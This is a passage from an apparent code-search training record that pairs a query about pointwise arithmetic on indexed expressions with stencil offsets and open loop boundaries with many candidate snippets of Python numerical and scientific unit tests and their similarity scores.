index_xyz[1], index_xyz[2]\n \n n1, n2, n3 = points_abc[0], points_abc[1], points_abc[2]\n p_1, p_2, p_3 = n1//b_d, n2//b_d, n3//b_d\n \n ni_1 = numpy.mod(r_11*i_1 + r_12*i_2 + r_13*i_3 + b_n_1*p_1, n1)\n ni_2 = numpy.mod(r_21*i_1 + r_22*i_2 + r_23*i_3 + b_n_2*p_2, n2)\n ni_3 = numpy.mod(r_31*i_1 + r_32*i_2 + r_33*i_3 + b_n_3*p_3, n3)\n ni = numpy.stack([ni_1, ni_2, ni_3], axis=0)\n return ni", "def run_test(dim=3):\n\n traces = []\n\n for smoothing in range(10, 101, 10):\n pencilbeams = []\n num_sight_lines = 100\n\n # Construct our pencilbeams\n for ix in range(0, num_sight_lines+1):\n # Make impact parameters covering the full\n # particle in x\n x = ix / (1. 
* num_sight_lines) * smoothing\n \n pencilbeams.append(\n dict(x=x, y=0),\n )\n\n results = []\n for pencilbeam in pencilbeams:\n result = testsph(h=smoothing, dim=dim, **pencilbeam)\n results.append(result)\n\n # Integrate the pencilbeam weightings to find the full SPH weighting\n # This is the plane x-z from origin along +ve x-axis (sitting at y=0)\n particle_integral = integrate.trapz([x for x in results], [x['x'] for x in pencilbeams])\n \n # \"All smoothing lengths should integrate to the same value \"\n\n # We've sampled a quadrant in x-y and integrated entirely along z, so mulitply by 4\n print particle_integral * 4.\n\n traces.append(go.Scatter(y=[x for x in results], x=[y['x'] for y in pencilbeams]))\n\n # The mass of a particle should be the area under each of these curves(?)\n plot(traces)", "def test0421_2d_numerical_comparison_on_fprop_vs_np_batchsize1_mp(\n self,\n batch_size=1,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=16,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n\n tf.keras.backend.set_floatx('float16')\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=None,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n dtype=Policy('infer_float32_vars'),\n )", "def test_get_debug_values_success():\r\n\r\n prev_value = config.compute_test_value\r\n for mode in ['ignore', 'warn', 'raise']:\r\n\r\n try:\r\n config.compute_test_value = mode\r\n\r\n x = T.vector()\r\n x.tag.test_value = numpy.zeros((4,), dtype=config.floatX)\r\n y = numpy.zeros((5, 5))\r\n\r\n iters = 0\r\n\r\n for x_val, y_val in op.get_debug_values(x, y):\r\n\r\n assert x_val.shape == (4,)\r\n assert y_val.shape == (5, 5)\r\n\r\n iters += 1\r\n\r\n assert iters == 1\r\n\r\n finally:\r\n config.compute_test_value = prev_value", "def test_apply(buffer, window, out):\n buffer = np.array(buffer, dtype=np.float32)\n windows.apply(buffer, window)\n assert_almost_equal(buffer, np.array(out))", "def test_advinc_subtensor1():\r\n for shp in [(3, 3), (3, 3, 3)]:\r\n shared = gpuarray_shared_constructor\r\n xval = numpy.arange(numpy.prod(shp), dtype='float32').reshape(shp) + 1\r\n yval = numpy.empty((2,) + shp[1:], dtype='float32')\r\n yval[:] = 10\r\n x = shared(xval, name='x')\r\n y = tensor.tensor(dtype='float32',\r\n broadcastable=(False,) * len(shp),\r\n name='y')\r\n expr = tensor.advanced_inc_subtensor1(x, y, [0, 2])\r\n f = theano.function([y], expr, mode=mode_with_gpu)\r\n assert sum([isinstance(node.op, GpuAdvancedIncSubtensor1)\r\n for node in f.maker.fgraph.toposort()]) == 1\r\n rval = f(yval)\r\n rep = xval.copy()\r\n rep[[0, 2]] += yval\r\n assert numpy.allclose(rval, rep)", "def test_sum_pos_5() -> None:\n # Fourth step, 5th square.\n assert nth(sw.sum_walk(), 3) == 5", "def test031_1d_numerical_comparison_on_vs_np(\n self,\n batch_size=8,\n num_features=16,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features) + .125\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n )", "def transfer_state_in_buffer(n, gate_matrix, bits, expr_buffer, gate_buffer):\n idx = calc_einsum_idx(bits, n)\n expr_buffer.append(idx)\n gate_buffer.append(gate_matrix)", "def test_member_input_flags(self):\r\n\r\n if 
config.mode == 'FAST_COMPILE':\r\n return\r\n\r\n M = Module()\r\n M.x = T.dvector()\r\n M.y = T.dvector()\r\n xval= numpy.asarray([0, 0.5])\r\n M.f = Method([io.In(M.x,\r\n mutable=True,\r\n update=(M.x - M.y),\r\n value=xval)], M.x + M.y)\r\n m = M.make()\r\n m.y = numpy.asarray([1, 2])\r\n\r\n assert numpy.all(m.f(xval) == [1, 2.5])\r\n assert numpy.all(xval == [-1, -1.5])", "def test_elemwise_composite_support_code():\r\n X = tcn.shared_constructor(value=numpy.zeros((100, 10), dtype=\"float32\"),\r\n name='X')\r\n W = tcn.shared_constructor(value=numpy.zeros((10, 1), dtype=\"float32\"),\r\n name='W')\r\n U = T.dot(X, W)\r\n Y = tcn.shared_constructor(value=numpy.zeros((100, 1), dtype=\"float32\"),\r\n name='Y')\r\n P = T.exp(-(Y - U) ** 2)\r\n epsilon = numpy.asarray(0.001, dtype=\"float32\")\r\n NLL = -T.mean(T.log(P + epsilon)) # SupportCodeError\r\n G = theano.gradient.grad(NLL, wrt=[W])\r\n\r\n backup = theano.config.warn.identify_1pexp_bug\r\n theano.config.warn.identify_1pexp_bug = False\r\n try:\r\n f_grad = theano.function(inputs=[], outputs=G, mode=mode_with_gpu)\r\n finally:\r\n theano.config.warn.identify_1pexp_bug = backup\r\n f_grad()\r\n\r\n topo = f_grad.maker.fgraph.toposort()\r\n assert sum([isinstance(node.op, T.Elemwise) for node in topo]) == 1\r\n #I suspect this was failing in the original branch too\r\n assert sum([isinstance(node.op, tcn.GpuElemwise) for node in topo]) == 1", "def test_1d_1d(self):\n \n self.assertEqual(len(self.storage), 0)\n \n @interpolated(self.storage, max_distance=0.6)\n def func(x):\n return x**2\n \n a = func(1)\n self.assertEqual(len(self.storage), 1)\n self.assertEqual(a, 1**2)\n \n a = func(2)\n self.assertEqual(len(self.storage), 2)\n self.assertEqual(a, 2**2)\n \n a = func(1.5)\n self.assertEqual(len(self.storage), 2)\n self.assertAlmostEqual(a, 0.5*(1**2 + 2**2))", "def test_get_functions(sersic_2d_image,segm_and_cat):\n cat, segm, segm_deblend = segm_and_cat\n\n base_source = cat[0]\n\n source = base_source\n\n assert pf.get_source_position(source) == (base_source.maxval_xindex, base_source.maxval_yindex)\n assert pf.get_source_elong(source) == base_source.elongation.value\n assert pf.get_source_ellip(source) == base_source.ellipticity.value\n assert pf.get_source_theta(source) == base_source.orientation.to('rad').value\n\n x0, y0 = pf.get_source_position(source)\n ellip, theta = pf.get_source_ellip(source), pf.get_source_theta(source)\n\n assert np.round(pf.get_amplitude_at_r(200, sersic_2d_image, x0, y0 , ellip, theta), 6) == 0.036798", "def elemwise_checker(\n op, expected_f, gap=None, test_dtypes=None, grad_test=True, name=None, gap_grad=None\n):\n\n if test_dtypes is None:\n test_dtypes = sparse.all_dtypes\n\n class TestElemwise:\n def setup_method(self):\n super().setup_method()\n self.op = op\n self.expected_f = expected_f\n self.gap = gap\n if gap_grad is not None:\n self.gap_grad = gap_grad\n else:\n self.gap_grad = gap\n # Ensure the test's name is correct.\n assert eval(self.__class__.__name__) is self.__class__\n\n def test_op(self):\n for format in sparse.sparse_formats:\n for dtype in test_dtypes:\n if dtype == \"int8\" or dtype == \"uint8\":\n continue\n\n # When testing with unsigned integers,\n # we must check if the gap contains\n # negative numbers.\n if dtype.startswith(\"uint\"):\n if self.gap and len(self.gap) == 2 and self.gap[0] < 0:\n if self.gap[1] >= 1:\n self.gap = (0, self.gap[1])\n else:\n raise TypeError(\n \"Gap not suitable for\", dtype, self.__name__\n )\n\n variable, data = sparse_random_inputs(\n 
format, shape=(4, 7), out_dtype=dtype, gap=self.gap\n )\n\n f = aesara.function(variable, self.op(*variable))\n\n tested = f(*data)\n data = [m.toarray() for m in data]\n expected = self.expected_f(*data)\n\n assert tested.format == format\n tested = tested.toarray()\n\n try:\n utt.assert_allclose(expected, tested)\n except AssertionError:\n raise AssertionError(self.__name__)\n\n # Test with int8 as dtype\n # These tests are not in the loop for two reasons.\n # First, in recent version of numpy, when a numpy\n # function have int8 as input dtype, it returns a\n # float16 as output dtype. Since this does not provide\n # enough precision, we upcast the data before we apply the\n # function.\n # Second, the tolerance for the checkup in DebugMode\n # is too high.\n for dtype in [\"int8\", \"uint8\"]:\n if dtype in test_dtypes:\n if self.gap:\n domain = self.gap\n # When testing with unsigned integers,\n # we must check if the gap contains\n # negative numbers.\n if dtype == \"uint8\":\n if len(domain) == 2 and domain[0] < 0:\n if domain[1] >= 1:\n domain = (0, domain[1])\n else:\n raise TypeError(\n \"Gap not suitable for\", dtype, self.__name__\n )\n\n else:\n domain = (0, 5)\n\n variable, data = sparse_random_inputs(\n format, shape=(4, 7), out_dtype=dtype, gap=domain\n )\n\n f = aesara.function(variable, self.op(*variable))\n\n old_value = (\n tensor.math.float32_atol,\n tensor.math.float32_rtol,\n tensor.math.float64_atol,\n tensor.math.float64_rtol,\n )\n tensor.math.float32_atol = 1e-4\n tensor.math.float32_rtol = 1e-3\n tensor.math.float64_atol = 1e-3\n tensor.math.float64_rtol = 1e-4\n try:\n tested = f(*data)\n finally:\n (\n tensor.math.float32_atol,\n tensor.math.float32_rtol,\n tensor.math.float64_atol,\n tensor.math.float64_rtol,\n ) = old_value\n\n data = [m.toarray().astype(\"float32\") for m in data]\n expected = self.expected_f(*data)\n\n assert tested.format == format\n tested = tested.toarray()\n\n try:\n utt.assert_allclose(tested, expected, rtol=1e-2)\n except AssertionError:\n raise AssertionError(self.__name__)\n\n if grad_test:\n\n def test_grad(self):\n for format in sparse.sparse_formats:\n for dtype in sparse.float_dtypes:\n variable, data = sparse_random_inputs(\n format, shape=(4, 7), out_dtype=dtype, gap=self.gap_grad\n )\n\n verify_grad_sparse(self.op, data, structured=True)\n\n # Set proper class name to uniquely identify tests.\n # Note that it is important to run this code *outside* of the `Tester`\n # class itself, otherwise it will not work properly for some reason.\n if name is None:\n name = op.__name__.capitalize() + \"Tester\"\n TestElemwise.__name__ = name\n if hasattr(TestElemwise, \"__qualname__\"):\n TestElemwise.__qualname__ = name\n assert \"Roundhalftoeven\" not in TestElemwise.__name__\n\n return TestElemwise", "def structured_pow(x, y):\r\n # see decorator for function body\r", "def test_apply_flags():\n true_value = dqflags.pixel['HOT'] + dqflags.pixel['DO_NOT_USE']\n\n print(true_value)\n\n badmap = np.zeros((10, 10), dtype=np.int)\n true_map = np.zeros((10, 10), dtype=np.uint32)\n for i in range(10):\n badmap[i, i] = 1\n true_map[i, i] = true_value\n\n\n print(true_map)\n\n\n flag_names = ['HOT', 'DO_NOT_USE']\n pixmap = bpd.apply_flags(badmap, flag_names)\n\n\n print(pixmap)\n\n\n assert np.all(pixmap == true_map)", "def testNestedFunctionGradientCall(self):\n check_numerics_callback.enable_check_numerics()\n\n x = constant_op.constant(1.0 - 1e-8, dtype=dtypes.float32)\n\n @def_function.function\n def asinp1(x):\n # asin()'s gradient 
overflows at the value close to 1.0.\n return math_ops.asin(x) + 1.0\n\n @def_function.function\n def loss(x):\n return math_ops.square(asinp1(x))\n\n with backprop.GradientTape() as tape:\n tape.watch(x)\n y = loss(x)\n message = self._assertRaisesInvalidArgumentErrorAndGetMessage(\n lambda: self.evaluate(tape.gradient(y, x)))\n self.assertTrue(re.search(r\"gradient\", message))", "def test_verify():\n Lx = 10; Ly = 10; c = 1.0\n\n def I(x, y):\n return exp(-pow(x-Lx/2.0,2)/2.0 -pow(y-Ly/2.0,2)/2.0)\n def f(x, y, t):\n return sin(2*x) + y\n def bc(x, y, t):\n return sin(t)\n\n # use string formulas instead so also weave can be tested:\n # (need to transfer globals() so that vectorized versions work)\n I = StringFunction('exp(-pow(x-Lx/2.0,2)/2.0 - pow(y-Ly/2.0,2)/2.0)',\n independent_variables=('x', 'y'),\n Lx=Lx, Ly=Ly, globals=globals())\n f = StringFunction('sin(2*x) + y',\n independent_variables=('x', 'y', 't'),\n globals=globals())\n bc = StringFunction('sin(t)',\n independent_variables=('x', 'y', 't'),\n globals=globals())\n\n #nx = 15; ny = 10; tstop = 2\n nx = 4; ny = 3; tstop = 16\n verify_implementations(I, f, c, bc, Lx, Ly, nx, ny, tstop)", "def _set_bounds(b, x, n):\n for j in range(1, n - 1):\n for i in range(1, n - 1):\n x[index_of(i, j, 0, n)] = -x[index_of(i, j, 1, n)] if b == 3 else x[index_of(i, j, 1, n)]\n x[index_of(i, j, 0, n - 1)] = -x[index_of(i, j, 1, n - 2)] if b == 3 else x[index_of(i, j, 1, n - 2)]\n for k in range(1, n - 1):\n for i in range(1, n - 1):\n x[index_of(i, 0, k, n)] = -x[index_of(i, 1, k, n)] if b == 2 else x[index_of(i, 1, k, n)]\n x[index_of(i, n - 1, 0, n - 1)] = -x[index_of(i, n - 2, k, n - 2)] if b == 2 else x[\n index_of(i, n - 2, k, n - 2)]\n for k in range(1, n - 1):\n for j in range(1, n - 1):\n x[index_of(0, j, k, n)] = -x[index_of(1, j, k, n)] if b == 1 else x[index_of(1, j, k, n)]\n x[index_of(n - 1, j, k, n - 1)] = -x[index_of(n - 2, j, k, n)] if b == 1 else x[\n index_of(n - 2, j, k, n)]\n\n x[index_of(0, 0, 0, n)] = 1 / 3 * (x[index_of(1, 0, 0, n)] + x[index_of(0, 1, 0, n)] + x[index_of(0, 0, 1, n)])\n x[index_of(0, n - 1, 0, n)] = 1 / 3 * (\n x[index_of(1, n - 1, 0, n)] + x[index_of(0, n - 2, 0, n)] + x[index_of(0, n - 1, 1, n)])\n x[index_of(0, 0, n - 1, n)] = 1 / 3 * (\n x[index_of(1, 0, n - 1, n)] + x[index_of(0, 1, n - 1, n)] + x[index_of(0, 0, n - 2, n)])\n x[index_of(0, n - 1, n - 1, n)] = 1 / 3 * (\n x[index_of(1, n - 1, n - 1, n)] + x[index_of(0, n - 2, n - 1, n)] + x[index_of(0, n - 1, n - 2, n)])\n x[index_of(n - 1, 0, 0, n)] = 1 / 3 * (\n x[index_of(n - 2, 0, 0, n)] + x[index_of(n - 1, 1, 0, n)] + x[index_of(n - 1, 0, 1, n)])\n x[index_of(n - 1, n - 1, 0, n)] = 1 / 3 * (\n x[index_of(n - 2, n - 1, 0, n)] + x[index_of(n - 1, n - 2, 0, n)] + x[index_of(n - 1, n - 1, 1, n)])\n x[index_of(n - 1, 0, n - 1, n)] = 1 / 3 * (\n x[index_of(n - 2, 0, n - 1, n)] + x[index_of(n - 1, 1, n - 1, n)] + x[index_of(n - 1, 0, n - 2, n)])\n x[index_of(n - 1, n - 1, n - 1, n)] = 1 / 3 * (\n x[index_of(n - 2, n - 1, n - 1, n)] + x[index_of(n - 1, n - 2, n - 1, n)] + x[\n index_of(n - 1, n - 1, n - 2, n)])", "def TestFunc2(x):\r\n return 10*(-0.02*x[0] + 0.5*x[0]*x[0] + x[1])**2 \\\r\n + 128*(-0.02*x[0] + 0.5*x[0]*x[0] - x[1]/4) \\\r\n - (8e-5)*x[0]", "def test0321_2d_numerical_comparison_on_vs_np_batchsize1(\n self,\n batch_size=1,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=16,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient 
at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n )", "def test_independent_parameter(self, mocker):\r\n spy = mocker.spy(qml.gradients.finite_difference, \"generate_shifted_tapes\")\r\n\r\n with qml.tape.JacobianTape() as tape:\r\n qml.RX(0.543, wires=[0])\r\n qml.RY(-0.654, wires=[1])\r\n qml.expval(qml.PauliZ(0))\r\n\r\n dev = qml.device(\"default.qubit\", wires=2)\r\n tapes, fn = finite_diff(tape)\r\n res = fn(dev.batch_execute(tapes))\r\n assert res.shape == (1, 2)\r\n\r\n assert len(spy.call_args_list) == 1\r\n\r\n # only called for parameter 0\r\n assert spy.call_args[0][0:2] == (tape, 0)", "def test_deep(self, expr, result, mode):\n i, j, k, l = dimify('i j k l')\n a = symbol(name='a', dimensions=(i, j, k, l), value=2., mode=mode)\n b = symbol(name='b', dimensions=(j, k), value=3., mode=mode)\n fa = a.base.function if mode == 'indexed' else a\n fb = b.base.function if mode == 'indexed' else b\n\n eqn = eval(expr)\n Operator(eqn)(fa, fb)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def test_simple_3d(self):\r\n a = tt.dtensor3()\r\n increment = tt.dscalar()\r\n sl1 = slice(None)\r\n sl2_end = tt.lscalar()\r\n sl2 = slice(sl2_end)\r\n sl3 = 2\r\n\r\n for do_set in [True, False]:\r\n print \"Set\", do_set\r\n\r\n if do_set:\r\n resut = tt.set_subtensor(a[sl1, sl3, sl2], increment)\r\n else:\r\n resut = tt.inc_subtensor(a[sl1, sl3, sl2], increment)\r\n\r\n f = theano.function([a, increment, sl2_end], resut)\r\n\r\n val_a = numpy.ones((5, 3, 4))\r\n val_inc = 2.3\r\n val_sl2_end = 2\r\n\r\n expected_result = numpy.copy(val_a)\r\n result = f(val_a, val_inc, val_sl2_end)\r\n\r\n if do_set:\r\n expected_result[:, sl3, :val_sl2_end] = val_inc\r\n else:\r\n expected_result[:, sl3, :val_sl2_end] += val_inc\r\n\r\n utt.assert_allclose(result, expected_result)", "def test_annular_fpm():\n\n # test some semi-random cases - is the array size as expected? \n assert masks.annular_fpm(3, 2, np.inf).shape == (3*2*2, 3*2*2)\n assert masks.annular_fpm(3, 5, np.inf).shape == (3*5*2, 3*5*2)\n assert masks.annular_fpm(3, 5, 10).shape == (3*10*2, 3*10*2)\n assert masks.annular_fpm(3, 5, 11).shape == (3*11*2, 3*11*2)\n\n # test some pixel values are as expected. 
\n mask = masks.annular_fpm(3, 2, 10)\n assert mask[0,0]==0 # corner is black\n assert mask[5*10, 5*10]==1 # in between is white\n assert mask[3*10, 3*10]==0 # center is black", "def attest_ind (a, b, dimension=None, printit=0, name1='Samp1', name2='Samp2',writemode='a'):\r\n if dimension == None:\r\n a = N.ravel(a)\r\n b = N.ravel(b)\r\n dimension = 0\r\n x1 = amean(a,dimension)\r\n x2 = amean(b,dimension)\r\n v1 = avar(a,dimension)\r\n v2 = avar(b,dimension)\r\n n1 = a.shape[dimension]\r\n n2 = b.shape[dimension]\r\n df = n1+n2-2\r\n svar = ((n1-1)*v1+(n2-1)*v2) / float(df)\r\n zerodivproblem = N.equal(svar,0)\r\n svar = N.where(zerodivproblem,1,svar) # avoid zero-division in 1st place\r\n t = (x1-x2)/N.sqrt(svar*(1.0/n1 + 1.0/n2)) # N-D COMPUTATION HERE!!!!!!\r\n t = N.where(zerodivproblem,1.0,t) # replace NaN/wrong t-values with 1.0\r\n probs = abetai(0.5*df,0.5,float(df)/(df+t*t))\r\n\r\n if type(t) == N.ndarray:\r\n probs = N.reshape(probs,t.shape)\r\n if probs.shape == (1,):\r\n probs = probs[0]\r\n \r\n if printit <> 0:\r\n if type(t) == N.ndarray:\r\n t = t[0]\r\n if type(probs) == N.ndarray:\r\n probs = probs[0]\r\n statname = 'Independent samples T-test.'\r\n outputpairedstats(printit,writemode,\r\n name1,n1,x1,v1,N.minimum.reduce(N.ravel(a)),\r\n N.maximum.reduce(N.ravel(a)),\r\n name2,n2,x2,v2,N.minimum.reduce(N.ravel(b)),\r\n N.maximum.reduce(N.ravel(b)),\r\n statname,t,probs)\r\n return\r\n return t, probs", "def test_ex_2_3(self):\n\n wam = WAM()\n wam.execute(self.fig_2_3_instrs)\n aW = wam.deref_reg(5)\n aZ = wam.deref_reg(2)\n wam.execute(self.fig_2_4_instrs)\n aX = wam.deref_reg(5)\n aY = wam.deref_reg(4)\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def test0221_2d_numerical_comparison_on_fprop_vs_np_batchsize1(\n self,\n batch_size=1,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=16,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=None,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n )", "def test_local_dot22_to_dot22scalar():\r\n A = T.dmatrix()\r\n mode = theano.compile.mode.get_default_mode()\r\n opt = theano.tensor.opt.in2out(\r\n theano.tensor.blas.local_dot22_to_dot22scalar)\r\n mode = mode.__class__(optimizer=opt)\r\n\r\n x = T.dscalar()\r\n y = T.dscalar()\r\n z = T.dscalar()\r\n # make sure to don't have dimshuffle as we don't opt those cases\r\n m = T.dmatrix()\r\n r = T.drow()\r\n for idx, node in enumerate([\r\n #Old working cases\r\n T.mul(_dot22(A, A), x),\r\n T.mul(_dot22(A, A), x, y),\r\n T.mul(_dot22(A, A), x, r),\r\n T.mul(_dot22(A, A), m, x),\r\n T.mul(_dot22(A, A), x, m),\r\n T.mul(_dot22(A, A), x, (m * y)),\r\n T.mul(_dot22(A, A), (m * y), x),\r\n T.mul(_dot22(A, A), x, (r * y)),\r\n T.mul(_dot22(A, A), (r * y), x),\r\n T.mul(_dot22(A, A), (x * y), (m * x)),\r\n T.mul(_dot22(A, A), (r * y), (y * x)),\r\n\r\n # Case that was raising an assert that is fixed in gh-1507\r\n T.mul(_dot22(A, A), (m * y), m),\r\n T.mul(_dot22(A, A), m, (m * y)),\r\n T.mul(_dot22(A, A), (r * y), (m * x)),\r\n\r\n # assert fixed in gh-1507 and opt case added in gh-1515\r\n T.mul(_dot22(A, A), (m * y * z), m),\r\n T.mul(_dot22(A, A), m, (m * y * z)),\r\n\r\n # Opt case added in gh-1515\r\n T.mul(_dot22(A, A), T.mul(m, y, z), 
m),\r\n T.mul(_dot22(A, A), m, T.mul(m, y, z)),\r\n\r\n #Case that opt later in gh-1515\r\n T.mul(_dot22(A, A), (r * m), (m * x)),\r\n ]):\r\n node2 = theano.tensor.blas.local_dot22_to_dot22scalar.transform(\r\n node.owner)\r\n assert node2\r\n f = theano.function([x, y, z, m, r, A], node,\r\n mode=mode, on_unused_input='ignore')\r\n f(.1, .2, .3, [[1, 2], [3, 4]], [[5, 6]], [[7, 8], [9, 10]])", "def mem_update(ops, x, mem, spike):\n #print(ops(x).size())\n #print(spike.size())\n mem = mem * decay * (1. - spike) + ops(x)\n spike = act_fun(mem) # act_fun : approximation firing function\n return mem, spike", "def test_grad_vector(func, motion, optimized, preserve_result, x):\n utils.test_reverse_array(func, motion, optimized, preserve_result, x)", "def test07(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), b\n cr = c[\"a + 2 * d - 3 > 0\"]\n nr = a[(a + 2 * b - 3) > 0]\n # print \"ca[expr] ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"carray[expr] does not work correctly\")", "def test_matrix22(gridsize=50):\n\n v1 = vec2(3,0)\n v2 = vec2(0,3)\n\n #rotate 45 degrees \n m22 = matrix22()\n m22.from_euler(45)\n\n # make a second matrix, also 45 degrees, should give us 90 total \n m22_2 = matrix22()\n m22_2.from_euler(45)\n m22 = m22_2 * m22\n\n # mutliply a vector by the matrix \n v3 = m22 * v2 \n\n fb = pixel_op() \n fb.create_buffer(800, 800)\n fb.graticule(gridsize)\n \n pts = [ (0,0), (0,1), (2,1), (0,2) ]\n #bloody_simple_2drender('2d_rotation.png', pts=pts, gridsize=50, pfb=fb)\n\n vecs = [v2,v3]\n bloody_simple_2drender('2d_rotation.png', vecs=vecs, gridsize=50, pfb=fb)\n\n #rotate the points by matrix multiplication \n pts = m22.batch_mult_pts(pts) \n bloody_simple_2drender('2d_rotation.png', pts=pts, gridsize=50, pfb=fb)\n fb.save('2d_rotation.png')", "def loc_eval(x, b):\r\n loc_est = 0\r\n for i in enumerate(b): loc_est+=i[1]*(x**i[0])\r\n return(loc_est)" ]
[ "0.70109046", "0.5731927", "0.5725207", "0.5534058", "0.5485873", "0.54508567", "0.5420271", "0.5402067", "0.53938526", "0.5361206", "0.53606236", "0.5359261", "0.5359202", "0.5320887", "0.5293664", "0.5291382", "0.5265721", "0.52385396", "0.523383", "0.52290106", "0.52282166", "0.52210116", "0.52201825", "0.52003807", "0.52002525", "0.51925", "0.5190279", "0.517582", "0.5171569", "0.5146713", "0.51125073", "0.51123774", "0.50978607", "0.50955325", "0.5090912", "0.50880325", "0.50740653", "0.5071987", "0.50706035", "0.5070082", "0.5057871", "0.50481606", "0.5044593", "0.50376034", "0.50371355", "0.5036854", "0.50213027", "0.50172997", "0.50147253", "0.50146693", "0.500944", "0.5008418", "0.5004359", "0.50037366", "0.50023204", "0.5002317", "0.5001583", "0.49806282", "0.49805528", "0.49785385", "0.4961971", "0.4958011", "0.49392173", "0.4914446", "0.49130878", "0.49093792", "0.4898081", "0.48907334", "0.48811746", "0.48791227", "0.48775607", "0.4875819", "0.48648772", "0.4864752", "0.48561007", "0.48539585", "0.48535743", "0.48447603", "0.48419723", "0.48402712", "0.48342207", "0.48335135", "0.4832914", "0.48265654", "0.4824387", "0.4822452", "0.48208398", "0.4820327", "0.48199952", "0.48177442", "0.48174328", "0.48074389", "0.4804056", "0.48031142", "0.48018813", "0.4797731", "0.4794664", "0.47879082", "0.4786367", "0.47737578" ]
0.5903518
1
Test pointwise arithmetic with stencil offsets and open loop boundaries in indexed expression format
def test_indexed_open_loops(self, expr, result):
    i, j, l = dimify('i j l')
    pushed = [d.size for d in [j, l]]
    j.size = None
    l.size = None
    a = DenseData(name='a', dimensions=(i, j, l), shape=(3, 5, 6)).indexed
    fa = a.function
    fa.data[0, :, :] = 2.

    eqn = eval(expr)
    Operator(eqn)(fa)
    assert np.allclose(fa.data[1, 1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)
    j.size, l.size = pushed
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_indexed_stencil(self, expr, result):\n j, l = dimify('j l')\n a = symbol(name='a', dimensions=(j, l), value=0., mode='indexed').base\n fa = a.function\n b = symbol(name='b', dimensions=(j, l), value=2., mode='indexed').base\n fb = b.function\n\n eqn = eval(expr)\n Operator(eqn)(fa, fb)\n assert np.allclose(fa.data[1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)", "def test_indexed_buffered(self, expr, result):\n i, j, l = dimify('i j l')\n a = symbol(name='a', dimensions=(i, j, l), value=2., mode='indexed').base\n fa = a.function\n\n eqn = eval(expr)\n Operator(eqn)(fa)\n assert np.allclose(fa.data[1, 1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)", "def _evaluable_view(self, stencil, arr, offset=0):\n if self.dim == 1:\n if isinstance(stencil, Stencil):\n\n l = self.borders[0]-stencil.b[0][0]\n r = -(self.borders[1]-stencil.b[0][1])\n else:\n l = self.borders[0]-stencil[0][0]\n r = -(self.borders[1]-stencil[0][1])\n return arr[l+offset: r+offset]\n else:\n raise NotImplementedError(\"Another dimension than one \"\n \"is not supplied\")", "def test_indexed_increment(self, expr, result):\n j, l = dimify('j l')\n a = symbol(name='a', dimensions=(j, l), value=2., mode='indexed').base\n fa = a.function\n fa.data[1:, 1:] = 0\n\n eqn = eval(expr)\n Operator(eqn)(fa)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def test_directly_indexed_expression(self, fa, ti0, t0, exprs):\n eqs = EVAL(exprs, ti0.base, t0)\n op = Operator(eqs, dse='noop', dle='noop')\n trees = retrieve_iteration_tree(op)\n assert len(trees) == 2\n assert trees[0][-1].nodes[0].expr.rhs == eqs[0].rhs\n assert trees[1][-1].nodes[0].expr.rhs == eqs[1].rhs", "def test_offsets():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n sections2 = ((B, H, 12.435, E),)\n EI, top, bot = bm.EI(sections, E)\n EI2, top2, bot2 = bm.EI(sections2, E)\n assert 0.99 < EI / EI2 < 1.01\n assert 0.99 < top / top2 < 1.01\n assert 0.99 < bot / bot2 < 1.01", "def test():\n Z = func.evaluate_circuit(F, e_x, e_y, e_xor)\n if Z == d[0]:\n return 0\n elif Z == d[1]:\n return 1", "def test_var_idx_in_modes(self, arr, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\n \"int array vars =\\n{}\\nMZgate(0, 1) | [vars[0], vars[1], vars[2]]\".format(arr)\n )\n assert bb.operations == [\n {'op': 'MZgate', 'args': [0, 1], 'kwargs': {}, 'modes': [1, 2, 3]}\n ]", "def _inside_op_range(self, idx):\n\n if idx < self._parameters.op_range[0]:\n return False\n return (self._parameters.op_range[1] < 0 or\n idx <= self._parameters.op_range[1])", "def test_lifted_index():\n pressure = np.array([1014., 1000., 997., 981.2, 947.4, 925., 914.9, 911.,\n 902., 883., 850., 822.3, 816., 807., 793.2, 770.,\n 765.1, 753., 737.5, 737., 713., 700., 688., 685.,\n 680., 666., 659.8, 653., 643., 634., 615., 611.8,\n 566.2, 516., 500., 